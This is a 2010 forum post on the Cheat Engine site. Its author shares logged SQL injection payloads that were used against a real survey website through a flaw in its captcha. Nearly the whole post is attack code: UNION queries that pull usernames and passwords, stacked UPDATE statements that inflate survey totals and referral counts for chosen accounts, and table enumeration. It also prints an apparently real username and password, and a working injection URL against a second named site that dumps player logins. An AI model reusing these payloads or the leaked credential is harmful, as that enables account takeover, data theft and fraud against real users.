Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


Just stumbled upon some AWsurveys SQL logs

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam
View previous topic :: View next topic  
Author Message
Haxory'
Grandmaster Cheater Supreme
Reputation: 92

Joined: 30 Jul 2007
Posts: 1900
PostPosted: Wed Nov 10, 2010 4:44 am    Post subject: Just stumbled upon some AWsurveys SQL logs Reply with quote
Some injections, not too special still fun. The hole was in the captcha they used. Not sure if all are valid.

Code:
SUBSTRING((SELECT mt.ID, SUBSTRING((SELECT mt2.Value FROM information_schema.tables AS mt2 WHERE  mt2.ID = mt.ID ORDER BY mt2.VALUE FOR XML PATH(')), 3, 2000) AS JoinedValue FROM information_schema.tables AS mt),1,9999)

-1;
INSERT INTO testtable (1);
UNION SELECT ALL id FROM testtable;
CREATE TABLE testtable (id VARCHAR(1000));

-1;UPDATE Users3 SET TotalSurveysAmount=50 WHERE UserName=CHAR(104)%2bCHAR(97)%2bCHAR(120)%2bCHAR(111)%2bCHAR(114)%2bCHAR(121)

INSERT INTO Users3 (UserName, Password, FirstName, LastName, Gender, Age, EmailAddress, ReferredBy, IPAddress, Referals, SignUpDate, Redeemed, TotalSurveysAmount, SendUpdates)

-1;UPDATE Users3 SET Referals=0 WHERE UserName=CHAR(114)%2bCHAR(101)%2bCHAR(100)%2bCHAR(110)%2bCHAR(101)%2bCHAR(116)%2bCHAR(119)%2bCHAR(111)%2bCHAR(114)%2bCHAR(107)

-1;UPDATE TABLE Users3


-1 UNION SELECT ALL CAST(UserName%2bCHAR(58)%2bPassword AS integer) FROM Users3 WHERE TotalSurveysAmount>50 AND Redeemed=0 UserName>CHAR(115)%2bCHAR(111)%2bCHAR(110)%2bCHAR(121)%2bCHAR(50)%2bCHAR(49)%2bCHAR(53)

-1 UNION SELECT ALL CAST(Password AS integer) FROM Users3 WHERE UserName=CHAR(115)%2bCHAR(103)%2bCHAR(52)%2bCHAR(50)%2bCHAR(49)

-1 UNION SELECT ALL CAST(UserName%2bCHAR(58)%2bPassword AS integer) FROM Users3 WHERE TotalSurveysAmount>80 AND Redeemed=0 AND username>30061987
CHAR(115)%2bCHAR(103)%2bCHAR(52)%2bCHAR(50)%2bCHAR(49)
sony215:sonyvaio



-1 UNION SELECT ALL CAST((UserName%2bCHAR(58)%2bPassword) AS integer) FROM Users2 WHERE TotalSurveysAmount>57 AND Redeemed=0 AND Referals>10

-1 UNION SELECT ALL CAST(COUNT(UserName) AS string) FROM Users3 WHERE TotalSurveysAmount>70 AND Redeemed=0


-1 UNION SELECT ALL CAST((UserName%2bCHAR(58)%2bPassword) AS integer) FROM Users3 WHERE TotalSurveysAmount>40 AND Redeemed=0 AND Referals>25


-1;UPDATE Users3 SET Referals=200 WHERE EmailAddress=CHAR(114)%2bCHAR(97)%2bCHAR(110)%2bCHAR(106)%2bCHAR(105)%2bCHAR(116)%2bCHAR(104)%2bCHAR(46)%2bCHAR(110)%2bCHAR(106)%2bCHAR(48)%2bCHAR(55)%2bCHAR(64)%2bCHAR(103)%2bCHAR(109)%2bCHAR(97)%2bCHAR(105)%2bCHAR(108)%2bCHAR(46)%2bCHAR(99)%2bCHAR(111)%2bCHAR(109)



Code:
-1 UNION SELECT ALL CAST(table_name AS integer) FROM information_schema.tables WHERE table_name>CHAR(78)%2bCHAR(117)%2bCHAR(109)%2bCHAR(98)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115)

where table_name>Numbers


EDIT:
Nice, a few other db's on this usb stick. Good old times.
http://www.ferion.com/portal/portal.php?id=10&pid=73579+UNION+SELECT+CONCAT(login,char(5Cool,password)+FROM+players;
SO simple, so effective :')
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites